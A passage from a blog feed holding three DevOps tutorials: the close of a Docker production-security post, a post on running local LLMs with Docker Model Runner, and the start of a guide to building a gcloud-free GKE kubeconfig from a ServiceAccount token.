<p>This is not hypothetical. This is happening now. And it changes how you should think about every <code>docker pull</code> and every <code>FROM</code> line in your Dockerfiles.</p>
<hr />
<h2>Docker Hardened Images: Fewer CVEs by Default</h2>
<p>Docker recognized that the base image problem is systemic. If every <code>nginx</code>, <code>node</code>, and <code>python</code> image ships with dozens of known vulnerabilities, every developer inherits those vulnerabilities whether they know it or not.</p>
<p>The answer is <strong>Docker Hardened Images</strong> - curated, continuously patched base images with up to 95% fewer CVEs than their standard counterparts. They are free, licensed under Apache 2.0, and available on Docker Hub. Same functionality, dramatically smaller attack surface.</p>
<p>Instead of pulling <code>nginx:alpine</code> with its 58 known vulnerabilities and hoping for the best, you pull the hardened equivalent and start from a clean baseline. Docker maintains these images with rapid CVE patching - when a vulnerability is disclosed, the hardened image is rebuilt and pushed within hours, not weeks.</p>
<p><strong>Docker Hardened Images (DHI)</strong> are not just "fewer CVEs." They are architecturally different:</p>
<ul>
<li><p><strong>Built from source</strong> by Docker with verified provenance</p>
</li>
<li><p><strong>Signed releases</strong> produced through a hardened build pipeline</p>
</li>
<li><p><strong>Rootless</strong> - no root user, ever</p>
</li>
<li><p><strong>Distroless runtime</strong> - stripped of shells, package managers, everything an attacker needs</p>
</li>
<li><p><strong>VEX attestations</strong> - machine-readable statements about which CVEs actually affect the image at runtime</p>
</li>
<li><p><strong>7-day fix guarantee</strong> - new CVE disclosed? Patched image pushed within 7 days</p>
</li>
<li><p><strong>Free and open source</strong> under Apache 2.0. 1,000+ images available.</p>
</li>
</ul>
<p>Here's why DHI matters for the Trivy/KICS attack pattern: those attacks worked because a valid publisher credential could push any tag. With DHI, images are built by Docker from source - the provenance and signatures must match the upstream source, or the image doesn't ship. The attack pattern structurally can't work against DHI.</p>
<blockquote>
<p><strong>What Nobody Tells You:</strong> Most Docker tutorials teach you to pick a base image by size. "Use Alpine, it's small!" Size matters, but CVE count matters more. A 5 MB image with 3 critical vulnerabilities is worse than a 50 MB image with zero. Check <code>docker scout quickview</code> <em>before</em> you write your FROM line. Every time.</p>
</blockquote>
<hr />
<h2>Scout Policies and Attestations</h2>
<p>Docker Scout isn't just <code>quickview</code> anymore. In 2026, it has a full policy engine:</p>
<ul>
<li><p><strong>Configurable policies</strong> - set severity thresholds, define what "compliant" means for your org</p>
</li>
<li><p><strong>Supply chain attestations policy</strong> - flags images that lack SBOM or provenance attestations</p>
</li>
<li><p><strong>CI gate</strong> - fail pipelines when policies are violated, not just when CVEs exist</p>
</li>
<li><p><strong>SBOM generation</strong> - CycloneDX and SPDX formats, attached as attestations to your images</p>
</li>
</ul>
<pre><code class="language-yaml"># GitHub Actions - policy-based gate, not just CVE count
- name: Check Scout policies
  run: |
    docker scout policy myapp:${{ github.sha }} \
      --exit-code \
      --org my-org
</code></pre>
<p>This is a shift from "scan and hope" to "define policy, enforce automatically."</p>
<hr />
<h2>Docker Sandboxes: Isolating AI Agents</h2>
<p>If you're running AI coding agents (Claude Code, Codex, Copilot, Gemini CLI), Day 6's Model Runner gives them intelligence. But intelligence without guardrails is dangerous.</p>
<p>Docker Sandboxes run each agent session inside a dedicated <strong>MicroVM</strong> - not a container, an actual virtual machine with its own kernel and private Docker daemon. The agent can clone repos, run tests, build images, execute arbitrary code - all inside a disposable environment with no path back to your host.</p>
<pre><code class="language-bash">brew install docker/tap/sbx
</code></pre>
<p>This is not "a container with extra flags." It's VM-grade isolation:</p>
<ul>
<li><p>Each session gets its own kernel (hardware boundary, not just namespace boundary)</p>
</li>
<li><p>Private Docker daemon inside the MicroVM (no socket mounting, no host privileges)</p>
</li>
<li><p>File access, network policies, and secrets defined before the agent runs</p>
</li>
<li><p>Disposable by design - delete and start fresh in seconds</p>
</li>
</ul>
<blockquote>
<p><strong>What Nobody Tells You:</strong> An LLM deciding its own security boundaries is not a security model. If your agent's system prompt says "don't delete files" - that's a suggestion, not enforcement. The bounding box has to come from infrastructure, not from a prompt. That's what Sandboxes provide.</p>
</blockquote>
<hr />
<h2>Your 7-Day Journey</h2>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/069660bc-4837-4ab3-b3f5-a9793d479b69.png" alt="" style="display:block;margin:0 auto" />

<p>Let's look back at how far you have come.</p>
<p><a href="https://blog.kubesimplify.com/day-1-what-actually-happens-when-you-type-docker-run"><strong>Day 1: Containers are processes.</strong></a> Not VMs. Not sandboxes. Linux processes restricted by namespaces (what they can see) and cgroups (what they can use). One kernel, many isolated process trees. This mental model underpins everything.</p>
<p><a href="https://blog.kubesimplify.com/day-2-your-images-are-a-supply-chain-and-it-s-probably-broken"><strong>Day 2: Images are supply chain artifacts</strong></a><strong>.</strong> Layers, manifests, content-addressed digests. Tags are mutable pointers; digests are immutable truth. Your image is a graph of filesystem snapshots, and every dependency in that graph is a potential attack vector.</p>
<p><a href="https://blog.kubesimplify.com/day-3-stop-writing-dockerfiles-from-scratch"><strong>Day 3: Dockerfiles,</strong> <code>docker init</code><strong>, and multi-stage builds.</strong></a> You stopped writing Dockerfiles from scratch and started generating them. Multi-stage builds cut your image sizes by 10x by separating build dependencies from runtime.</p>
<p><a href="https://blog.kubesimplify.com/day-4-breaking-isolation-on-purpose-volumes-networks-and-the-real-world"><strong>Day 4: Breaking isolation on purpose</strong></a><strong>.</strong> Volumes break filesystem isolation (data survives containers). Networks break network isolation (containers talk by name via DNS). Port mapping breaks host isolation (the outside world reaches in). One coherent story about carefully poking holes in container isolation.</p>
<p><a href="https://blog.kubesimplify.com/day-5-docker-compose-how-docker-actually-gets-used">Day 5: Docker Compose for real workflows</a><strong>or real workflows</strong><strong>.</strong> One YAML file, one command, an entire application stack. Services, networks, volumes, dependency ordering - all declarative, all version-controlled. Nobody types <code>docker run</code> with 15 flags in real life.</p>
<p><a href="https://blog.kubesimplify.com/day-6-run-an-llm-on-your-laptop-with-docker">Day 6: Docker + AI.</a><strong>er + AI.</strong> You pulled an LLM from Docker Hub, ran it locally with Metal GPU acceleration, hit it with an OpenAI-compatible API, and built a real AI-powered Flask app with Compose. Docker Model Runner, Gordon, MCP Toolkit - Docker is now an AI development platform.</p>
<p><strong>Day 7: Production security.</strong> Non-root users, read-only filesystems, resource limits, capability dropping, vulnerability scanning, hardened images. The difference between "it runs" and "it's safe to ship."</p>
<p>You went from <code>docker run hello-world</code> to hardened, scanned, resource-limited production containers in seven days. That is not trivial. That is a real foundation.</p>
<hr />
<h2><strong>Where Docker Ends</strong></h2>
<p>Docker builds containers. It does not run them at scale. And that is fine - it was never meant to.</p>
<p>Kubernetes is where containers go when they outgrow a single machine. Pod scheduling, auto-scaling, rolling deployments, service meshes, ingress controllers - that is K8s territory. Start with kind or minikube locally, then move to managed services (EKS, GKE, AKS). Everything you learned about images, Dockerfiles, and Compose translates directly. K8s runs the same OCI images you have been building all week.</p>
<p>For Kubernetes, it's easy, we have multiple courses</p>
<p><a class="embed-card" href="https://youtu.be/EV47Oxwet6Y?si=Hw69DkBc3MolinUy">https://youtu.be/EV47Oxwet6Y?si=Hw69DkBc3MolinUy</a></p>

<p>Testcontainers is where Docker meets testing. Spin up real databases, message brokers, and services as throwaway containers inside your test suite. Your integration tests run against real infrastructure, not mocks. It uses Docker under the hood, so everything you know applies.</p>
<p>Apple Containers is Apple's take on container runtime - one lightweight VM per container instead of Docker's shared-VM model. Sub-second boot times, stronger isolation, written in Swift. It is interesting for macOS-native workflows, but Docker remains the standard for production and CI/CD.</p>
<blockquote>
<p><em>What Nobody Tells You: Docker is not competing with Kubernetes. Docker builds. Kubernetes runs at scale. They are complementary tools, not alternatives. Every K8s cluster runs Docker-built images. Every CI/CD pipeline that feeds K8s uses Docker to build and scan. Learn both. In that order. Docker first - because you cannot orchestrate what you cannot build.</em></p>
</blockquote>
<hr />
<h2>The Production Checklist</h2>
<p>Before you ship any container, run through this:</p>
<pre><code class="language-plaintext">[ ] Non-root USER in Dockerfile
[ ] --read-only filesystem + --tmpfs where needed
[ ] --memory and --cpus limits set
[ ] --cap-drop=ALL + selective --cap-add
[ ] --security-opt=no-new-privileges
[ ] docker scout quickview - zero critical, zero high
[ ] Hardened base image or patched base image
[ ] HEALTHCHECK in Dockerfile
[ ] Log rotation configured (--log-opt max-size, max-file)
[ ] Image tagged with git SHA, not just :latest
[ ] Secrets in mounted files or external vault - never in ENV or layers
</code></pre>
<p>If you cannot check every box, you are not ready to ship. Go back and fix it. The checklist is not optional - it is the minimum.</p>
<hr />
<h2>Now Go Build Something</h2>
<p>Seven days ago, you did not know what a container was. Today, you can build one that is hardened enough to face the internet.</p>
<p>That is a real skill. Not a certificate. Not a badge. A skill - the kind that shows up when you push to production at 2 AM and everything works because you built it right the first time.</p>
<p>Docker is not the destination. It is the foundation. Everything that comes next - Kubernetes, service meshes, GitOps, platform engineering - is built on top of what you learned this week.</p>
<p>Now go build something amazing. And when you do, build it in a container.</p>
<hr />
<p><em>This concludes the</em> <em><strong>7 Days of Docker (2026)</strong></em> <em>series. If you enjoyed learning in a new way, then do follow me on</em> <a href="https://x.com/thesaloninarang"><em>X</em></a> <em>and connect with me on</em> <a href="https://www.linkedin.com/in/saloninarang/"><em>LinkedIn</em></a><em>.</em></p>
<p><em>Do share the articles and pointers you loved the most on socials and tag me.</em></p>
]]></content:encoded></item><item><title><![CDATA[Day 6: Run an LLM on Your Laptop - With Docker]]></title><description><![CDATA[7 Days of Docker (2026) - A Docker Captain's guide. Not your average tutorial.

I'm a Docker Captain. And if you'd told me two years ago that I'd be pulling AI models from Docker Hub the same way I pu]]></description><link>https://blog.kubesimplify.com/day-6-run-an-llm-on-your-laptop-with-docker</link><guid isPermaLink="true">https://blog.kubesimplify.com/day-6-run-an-llm-on-your-laptop-with-docker</guid><category><![CDATA[Docker]]></category><category><![CDATA[AI]]></category><category><![CDATA[llm]]></category><category><![CDATA[docker model runner]]></category><category><![CDATA[MLX]]></category><category><![CDATA[openai]]></category><category><![CDATA[Devops]]></category><dc:creator><![CDATA[Saloni Narang]]></dc:creator><pubDate>Thu, 30 Apr 2026 15:38:25 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/9743edf7-b681-4237-a9ac-e0401077ceb5.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong>7 Days of Docker (2026)</strong> - A Docker Captain's guide. Not your average tutorial.</p>
</blockquote>
<p>I'm a Docker Captain. And if you'd told me two years ago that I'd be pulling AI models from Docker Hub the same way I pull nginx, I would've laughed.</p>
<p>I'm not laughing anymore.</p>
<p>Docker shipped something called <strong>Model Runner</strong>. It lets you pull, run, and serve Large Language Models locally - no Python environment, no conda, no CUDA drivers, no dependency hell. One command. The model runs on your hardware with GPU acceleration. And it exposes an OpenAI-compatible API that any app can talk to.</p>
<p>Today we're going to pull a model, talk to it, build a real app that uses it, containerize that app, and deploy the whole thing with Compose. By the end of this post, you'll have a working AI-powered API running on your laptop. No cloud. No API keys. No monthly bill.</p>
<hr />
<h2>Pull a Model Like You Pull an Image</h2>
<pre><code class="language-bash">docker model pull ai/smollm2
</code></pre>
<pre><code class="language-console">Using cached model: 256.35 MiB
</code></pre>
<p>That's it. 256 megabytes. A small but capable language model, pulled from Docker Hub using the same infrastructure that serves container images. Same content-addressable storage, same caching.</p>
<p>Check what you have:</p>
<pre><code class="language-bash">docker model list
</code></pre>
<pre><code class="language-console">MODEL NAME  PARAMETERS  QUANTIZATION    ARCHITECTURE  MODEL ID      SIZE
smollm2     361.82 M    IQ2_XXS/Q4_K_M  llama         354bf30d0aa3  256.35 MiB
</code></pre>
<p>Look familiar? Same format as <code>docker images</code>. Model name, ID, size.</p>
<hr />
<h2>Talk to It</h2>
<pre><code class="language-bash">docker model run ai/smollm2 "What is Kubernetes in one sentence?"
</code></pre>
<pre><code class="language-console">Kubernetes is a container orchestration platform that automates the deployment,
scaling, and management of microservices-based applications.
</code></pre>
<p>That ran locally. On my Mac. With Metal GPU acceleration. No internet required after the initial pull.</p>
<p>Check the runner status:</p>
<pre><code class="language-bash">docker model status
</code></pre>
<pre><code class="language-console">Docker Model Runner is running
llama.cpp: running llama.cpp latest-metal e365e65
</code></pre>
<p><code>latest-metal</code> means it's using Apple Silicon GPU acceleration via Metal. On Linux with NVIDIA, you'd see a CUDA tag. Docker picks the right backend automatically.</p>
<p>Model Runner supports multiple inference backends:</p>
<table>
<thead>
<tr>
<th>Backend</th>
<th>Platform</th>
<th>Models</th>
</tr>
</thead>
<tbody><tr>
<td><strong>llama.cpp + Metal</strong></td>
<td>Mac (default)</td>
<td>GGUF models from Docker Hub (~340 tok/s)</td>
</tr>
<tr>
<td><strong>vllm-metal</strong></td>
<td>Mac (install required)</td>
<td>MLX models from Hugging Face (~275 tok/s)</td>
</tr>
<tr>
<td><strong>vLLM + CUDA</strong></td>
<td>Linux with NVIDIA GPU</td>
<td>Production inference</td>
</tr>
<tr>
<td><strong>Diffusers</strong></td>
<td>Linux/NVIDIA</td>
<td>Image generation (Stable Diffusion)</td>
</tr>
</tbody></table>
<h3>Want MLX models? Install vllm-metal</h3>
<p>llama.cpp + Metal is the default and handles GGUF models from Docker Hub. But if you want to run MLX models - Apple's native ML framework, designed for Apple Silicon's unified memory architecture - you can install the vllm-metal backend:</p>
<pre><code class="language-bash">docker model install-runner --backend vllm
</code></pre>
<pre><code class="language-console">Installing vllm backend...
vllm backend installed successfully
</code></pre>
<p>Check the status - both backends now running:</p>
<pre><code class="language-console">BACKEND    STATUS         DETAILS
llama.cpp  Running        llama.cpp latest-metal e365e65
vllm       Running        vllm-metal v0.1.0-20260320-122309
diffusers  Not Installed
mlx        Not Installed  package not installed
</code></pre>
<p>MLX models live on Hugging Face (not Docker Hub). Pull one:</p>
<pre><code class="language-bash">docker model pull hf.co/mlx-community/Llama-3.2-1B-Instruct-4bit
</code></pre>
<p>The same API (<code>localhost:12434/v1/</code>) serves both backends - Docker routes to the right one based on model format.</p>
<blockquote>
<p><strong>Watch out:</strong> You might see <code>docker model install-runner --backend mlx --gpu metal</code> suggested online or even by Gordon (Docker's AI assistant). On Docker Desktop, this fails with "Standalone installation not supported." The correct command is <code>--backend vllm</code>, which installs vllm-metal on Mac automatically. The <code>mlx</code> flag is for standalone Docker Engine only.</p>
</blockquote>
<p>Here's the same question hitting both backends on my M2 - same API, same endpoint, different models:</p>
<p>Here's the same question hitting both backends on my M2 - same API, same endpoint:</p>
<pre><code class="language-bash"># llama.cpp backend - SmolLM2 (362M params, GGUF from Docker Hub)
curl localhost:12434/v1/chat/completions \
  -d '{"model":"ai/smollm2", "messages":[{"role":"user","content":"What is a Docker container?"}]}'
</code></pre>
<pre><code class="language-console">"A Docker container is a lightweight, isolated, and self-contained runtime
environment that encapsulates an application and its dependencies."
74 tokens
</code></pre>
<pre><code class="language-bash"># vllm-metal backend - Llama 3.2 1B (1B params, MLX from Hugging Face)
curl localhost:12434/v1/chat/completions \
  -d '{"model":"hf.co/mlx-community/Llama-3.2-1B-Instruct-4bit", ...}'
</code></pre>
<pre><code class="language-console">"A Docker container is a lightweight, fully virtualized, and managed package
that performs a consistent version of an application, allowing it to be easily
deployed, scaled, and managed across multiple hosts and environments."
84 tokens
</code></pre>
<p>Two different models, two different backends, one API. Your app code doesn't change when you switch.</p>
<blockquote>
<p><strong>What Nobody Tells You:</strong> Model Runner doesn't run models inside containers. It runs them directly on your host hardware - Metal on Mac, CUDA on Linux. The llama.cpp process is a native binary on your host, not inside a container namespace. Why? Performance. LLMs need direct GPU access. Container isolation adds overhead. Docker's role here is distribution (pull from Hub) and API (OpenAI-compatible endpoint). The container is the app that CALLS the model, not the model itself.</p>
</blockquote>
<hr />
<h2>The API - This Changes Everything</h2>
<p>Model Runner exposes an OpenAI-compatible API. Two endpoints depending on where you're calling from:</p>
<table>
<thead>
<tr>
<th>Calling from...</th>
<th>URL</th>
</tr>
</thead>
<tbody><tr>
<td>Your Mac (terminal, Python, VS Code)</td>
<td><code>http://localhost:12434/v1/</code></td>
</tr>
<tr>
<td>Inside a Docker container</td>
<td><code>http://model-runner.docker.internal/v1/</code></td>
</tr>
</tbody></table>
<p>This is important. <code>model-runner.docker.internal</code> is Docker's internal DNS - it only resolves from inside containers. From your Mac, use <code>localhost:12434</code>.</p>
<p>Try it:</p>
<pre><code class="language-bash">curl http://localhost:12434/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{
    "model": "ai/smollm2",
    "messages": [{"role": "user", "content": "Explain Docker volumes in 2 sentences"}],
    "max_tokens": 60
  }'
</code></pre>
<pre><code class="language-json">{
  "choices": [{
    "message": {
      "role": "assistant",
      "content": "A Docker volume is a data container that allows you to mount a file system onto other files or directories. It enables you to use volumes as a source or destination for files within your Docker container, improving the portability and extensibility of your applications."
    }
  }],
  "usage": {
    "prompt_tokens": 37,
    "completion_tokens": 51,
    "total_tokens": 88
  }
}
</code></pre>
<p>That's the standard OpenAI chat completions format. Switch <code>localhost:12434</code> to <code>api.openai.com</code>, add an API key, and the same request hits GPT-4. Your code doesn't care which backend it talks to. Local model for dev, cloud for prod. Same interface.</p>
<blockquote>
<p><strong>What Nobody Tells You:</strong> If <code>curl</code> fails with "Could not resolve host: model-runner.docker.internal" - you're running it from your Mac, not from inside a container. Use <code>localhost:12434</code> from the host. This trips up everyone the first time.</p>
</blockquote>
<hr />
<h2>Build a Real AI App</h2>
<p>Enough theory. Let's build an AI-powered API, containerize it, and serve it with Compose.</p>
<h3>The App (<code>app.py</code>)</h3>
<pre><code class="language-python">from flask import Flask, request, jsonify
from openai import OpenAI
import os

app = Flask(__name__)
client = OpenAI(
    base_url=os.environ.get("LLM_URL", "http://model-runner.docker.internal/v1/"),
    api_key="not-needed"
)

@app.route("/")
def home():
    return jsonify({"service": "AI Demo", "model": "smollm2"})

@app.route("/ask")
def ask():
    question = request.args.get("q", "What is Docker?")
    response = client.chat.completions.create(
        model="ai/smollm2",
        messages=[{"role": "user", "content": question}],
        max_tokens=100
    )
    return jsonify({
        "question": question,
        "answer": response.choices[0].message.content,
        "tokens": response.usage.total_tokens
    })

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)
</code></pre>
<p>Notice <code>base_url</code> reads from an environment variable. From inside a container, it'll use the Docker internal hostname. The <code>api_key</code> is "not-needed" because Model Runner doesn't require auth.</p>
<h3>The Dockerfile</h3>
<pre><code class="language-dockerfile">FROM python:3.12-slim
WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY app.py .
EXPOSE 5000
CMD ["python", "app.py"]
</code></pre>
<h3>The requirements.txt</h3>
<pre><code class="language-plaintext">flask==3.1.1
openai==1.82.0
</code></pre>
<h3>compose.yaml</h3>
<pre><code class="language-yaml">services:
  ai-app:
    build: .
    ports:
      - "5002:5000"
    environment:
      - LLM_URL=http://model-runner.docker.internal/v1/
</code></pre>
<p>The <code>LLM_URL</code> environment variable tells the container to use the Docker-internal endpoint.</p>
<h3>Run It</h3>
<pre><code class="language-bash">docker compose up -d --build
</code></pre>
<pre><code class="language-console"> Image d6-ai-app-ai-app Built
 Network d6-ai-app_default Created
 Container d6-ai-app-ai-app-1 Started
</code></pre>
<h3>Test It</h3>
<pre><code class="language-bash">curl http://localhost:5002/
</code></pre>
<pre><code class="language-json">{"model": "smollm2", "service": "AI Demo"}
</code></pre>
<pre><code class="language-bash">curl "http://localhost:5002/ask?q=What+is+a+container+in+one+sentence"
</code></pre>
<pre><code class="language-json">{
  "answer": "A container is a lightweight package that runs applications and provides a controlled environment for the application's dependencies, allowing for easier deployment and scaling.",
  "question": "What is a container in one sentence",
  "tokens": 65
}
</code></pre>
<p>That's a containerized Flask app, calling a local LLM via Docker Model Runner, returning AI-generated answers. No cloud API. No API key. No monthly bill. Running on your laptop.</p>
<pre><code class="language-bash">docker compose down
</code></pre>
<hr />
<h2>What Else Is New - The Quick Version</h2>
<p>Model Runner is the headline, but Docker shipped more AI tooling in 2026:</p>
<p><strong>Gordon (</strong><code>docker ai</code><strong>)</strong> - Docker's built-in AI assistant. It reads your project - Dockerfiles, Compose files, running containers - and gives context-specific answers. Not generic ChatGPT. It sees your actual environment.</p>
<pre><code class="language-bash">docker ai "Why is my container using so much memory?"
</code></pre>
<p>Note: If you have many MCP servers configured, Gordon may error with "too many tools." Disable unused MCP servers in Docker Desktop settings to fix it.</p>
<p><strong>MCP Toolkit (</strong><code>docker mcp</code><strong>)</strong> - Model Context Protocol is a standard for connecting AI agents to tools. Docker runs MCP servers inside isolated containers with restricted permissions. Think of it as a security layer between AI agents and your system.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/2d0d09ac-9628-4bb0-8597-805e0e3951ee.png" alt="" style="display:block;margin:0 auto" />

<p><strong>Docker Scout</strong> - Already covered in Day 2, but worth repeating: scan your AI app images too. AI dependencies (PyTorch, transformers, etc.) are massive and often carry CVEs.</p>
<p><strong>Docker Sandboxes -</strong> Run AI agents inside dedicated MicroVMs with their own kernel and private Docker daemon. Not containers - actual VM-grade isolation. Each agent session gets a disposable environment where it can clone repos, run tests, and build images without any path back to your host. Works with Claude Code, Codex, Copilot, and others. Install with <code>brew install docker/tap/sbx</code>.</p>
<p>Docker's AI story in 2026 goes well beyond "run containers." It's Model Runner for local inference, Gordon for context-aware assistance, MCP for secure tool access, Sandboxes for agent isolation, and Scout for supply chain security. All shipping today.</p>
<hr />
<h2>The Big Picture</h2>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/45c6e62f-1735-42e9-979b-27d869837c05.png" alt="" style="display:block;margin:0 auto" />

<p>Docker in 2026 is two things:</p>
<ol>
<li><p><strong>A container platform</strong> (Days 1-5) - build, ship, run applications</p>
</li>
<li><p><strong>An AI development platform</strong> (Day 6) - pull models, run local inference, build AI apps</p>
</li>
</ol>
<p>The second part is new. And it's growing fast. Docker Hub already hosts Llama, Mistral, Phi, Gemma, SmolLM, and others in GGUF format with various quantization levels.</p>
<p>The OpenAI-compatible API is the killer feature. Write your app against the OpenAI interface. During development, point it at <code>localhost:12434</code> - free, fast, private. In production, swap to the real OpenAI API or any other compatible provider. Your code doesn't change.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/9d025369-4a8f-45b5-8904-0e9f2c1ad8dd.png" alt="" style="display:block;margin:0 auto" />

<hr />
<h2>Quick Reference</h2>
<table>
<thead>
<tr>
<th>Command</th>
<th>What It Does</th>
</tr>
</thead>
<tbody><tr>
<td><code>docker model pull ai/smollm2</code></td>
<td>Pull a model from Docker Hub</td>
</tr>
<tr>
<td><code>docker model run ai/smollm2 "prompt"</code></td>
<td>Chat with a model</td>
</tr>
<tr>
<td><code>docker model list</code></td>
<td>List downloaded models</td>
</tr>
<tr>
<td><code>docker model status</code></td>
<td>Check runner status and backend</td>
</tr>
<tr>
<td><code>docker model rm ai/smollm2</code></td>
<td>Remove a model</td>
</tr>
<tr>
<td><code>docker ai "question"</code></td>
<td>Ask Gordon (context-aware)</td>
</tr>
<tr>
<td><code>docker mcp --version</code></td>
<td>Check MCP Toolkit version</td>
</tr>
<tr>
<td><code>curl localhost:12434/v1/models</code></td>
<td>List models via API (from host)</td>
</tr>
<tr>
<td><code>curl localhost:12434/v1/chat/completions</code></td>
<td>Chat completions API (from host)</td>
</tr>
</tbody></table>
<hr />
<h2>Tomorrow: Day 7</h2>
<p>You just built an AI-powered app with Docker. From <code>docker model pull</code> to a working API in minutes.</p>
<p>Tomorrow is the finale. <strong>Day 7: Ship It.</strong> We take everything from the past 6 days and make it production-ready. Non-root users. Read-only filesystems. Resource limits. Security scanning. The checklist that separates side projects from production systems.</p>
]]></content:encoded></item><item><title><![CDATA[A Kubeconfig for GKE That Doesn't Need gcloud]]></title><description><![CDATA[When you run gcloud container clusters get-credentials, the kubeconfig it writes looks innocent — until you hand it to a teammate and they hit:
error: exec plugin: invalid apiVersion "client.authentication.k8s.io/v1beta1"
…or the classic gke-gcloud-a...]]></description><link>https://blog.kubesimplify.com/a-kubeconfig-for-gke-that-doesnt-need-gcloud</link><guid isPermaLink="true">https://blog.kubesimplify.com/a-kubeconfig-for-gke-that-doesnt-need-gcloud</guid><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Wed, 29 Apr 2026 05:56:22 GMT</pubDate><enclosure url="https://cloudmate-test.s3.us-east-1.amazonaws.com/res%2Fhashnode%2Fimage%2Fupload%2Fv1777443605504%2F64d466df-ca7e-4b49-b46d-a2c3177667b6.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>When you run <code>gcloud container clusters get-credentials</code>, the kubeconfig it writes looks innocent — until you hand it to a teammate and they hit:</p>
<pre><code>error: exec plugin: invalid apiVersion <span class="hljs-string">"client.authentication.k8s.io/v1beta1"</span>
</code></pre><p>…or the classic <code>gke-gcloud-auth-plugin: executable not found</code>.</p>
<p>That's because the generated kubeconfig doesn't actually contain a credential. It contains an <code>exec:</code> block that shells out to <code>gke-gcloud-auth-plugin</code>, which in turn calls <code>gcloud</code> to mint a fresh OAuth token on every kubectl call. If you look at the <code>users</code> section of a stock GKE kubeconfig, this is what's in there:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">users:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">gke_saiyam-project_us-east1-b_demo-test</span>
  <span class="hljs-attr">user:</span>
    <span class="hljs-attr">exec:</span>
      <span class="hljs-attr">apiVersion:</span> <span class="hljs-string">client.authentication.k8s.io/v1beta1</span>
      <span class="hljs-attr">command:</span> <span class="hljs-string">gke-gcloud-auth-plugin</span>
      <span class="hljs-attr">installHint:</span> <span class="hljs-string">Install</span> <span class="hljs-string">gke-gcloud-auth-plugin</span> <span class="hljs-string">for</span> <span class="hljs-string">use</span> <span class="hljs-string">with</span> <span class="hljs-string">kubectl</span> <span class="hljs-string">by</span> <span class="hljs-string">following</span>
        <span class="hljs-string">https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-access-for-kubectl#install_plugin</span>
      <span class="hljs-attr">interactiveMode:</span> <span class="hljs-string">IfAvailable</span>
      <span class="hljs-attr">provideClusterInfo:</span> <span class="hljs-literal">true</span>
</code></pre>
<p>No token. No cert. Just "run this plugin and ask it for auth." No gcloud on the machine, no access.</p>
<p>If you want a kubeconfig that <em>anyone</em> can use — a CI runner, a contractor's laptop, a script on a VM — you need to swap that exec-plugin auth for something self-contained. The cleanest answer: a Kubernetes ServiceAccount and a bearer token.</p>
<p>Here's the full flow, run end-to-end against a live GKE cluster.</p>
<h2 id="heading-the-mental-model">The mental model</h2>
<p>Four pieces, in order:</p>
<ol>
<li><strong>Identity</strong> — a ServiceAccount in the cluster</li>
<li><strong>Permissions</strong> — a (Cluster)RoleBinding attaching a role to that SA</li>
<li><strong>Credential</strong> — a token the SA can present to the API server</li>
<li><strong>Portable config</strong> — a kubeconfig file wrapping the token + cluster endpoint + CA cert</li>
</ol>
<p>The API server validates the token itself. No Google, no gcloud, no OAuth round-trip.</p>
<h2 id="heading-step-1-identity-and-permissions">Step 1: Identity and permissions</h2>
<pre><code class="lang-bash">kubectl create serviceaccount shared-access -n kube-system

kubectl create clusterrolebinding shared-access-binding \
  --clusterrole=cluster-admin \
  --serviceaccount=kube-system:shared-access
</code></pre>
<p>Output:</p>
<pre><code>serviceaccount/shared-access created
clusterrolebinding.rbac.authorization.k8s.io/shared-access-binding created
</code></pre><p>Two things worth calling out:</p>
<ul>
<li>The SA lives in <code>kube-system</code> because it's a cluster-wide utility identity. The namespace doesn't restrict its access — RBAC does.</li>
<li><code>cluster-admin</code> is <code>*</code> on <code>*</code>. Scope it down in production. <code>view</code>, <code>edit</code>, or a custom ClusterRole are usually what you actually want. If you only need namespace-scoped access, use a <code>RoleBinding</code> in that namespace instead of a <code>ClusterRoleBinding</code>.</li>
</ul>
<h2 id="heading-step-2-mint-a-long-lived-token">Step 2: Mint a long-lived token</h2>
<p>Before Kubernetes 1.24, creating a ServiceAccount automatically created a companion Secret with a non-expiring token. That was removed — long-lived bearer tokens are a security footgun — so now you opt in explicitly:</p>
<pre><code class="lang-bash">kubectl apply -f - &lt;&lt;<span class="hljs-string">'EOF'</span>
apiVersion: v1
kind: Secret
metadata:
  name: shared-access-token
  namespace: kube-system
  annotations:
    kubernetes.io/service-account.name: shared-access
<span class="hljs-built_in">type</span>: kubernetes.io/service-account-token
EOF
</code></pre>
<p>Output:</p>
<pre><code>secret/shared-access-token created
</code></pre><p>The magic is in two fields:</p>
<ul>
<li><strong><code>type: kubernetes.io/service-account-token</code></strong> — tells the token controller (built into <code>kube-controller-manager</code>) "I'm a Secret you should populate."</li>
<li><strong><code>kubernetes.io/service-account.name</code> annotation</strong> — tells it <em>which</em> ServiceAccount's identity to embed in the token.</li>
</ul>
<p>Wait a couple of seconds, then inspect the Secret — the controller has filled in the data for you:</p>
<pre><code class="lang-bash">kubectl get secret shared-access-token -n kube-system -o yaml
</code></pre>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">data:</span>
  <span class="hljs-attr">ca.crt:</span> <span class="hljs-string">LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUVMVENDQXBXZ0F3SUJB...</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">a3ViZS1zeXN0ZW0=</span>
  <span class="hljs-attr">token:</span> <span class="hljs-string">ZXlKaGJHY2lPaUpTVXpJMU5pSXNJbXRwWkNJNklrWnNZMkk0VFRkWmFrVjN...</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Secret</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">annotations:</span>
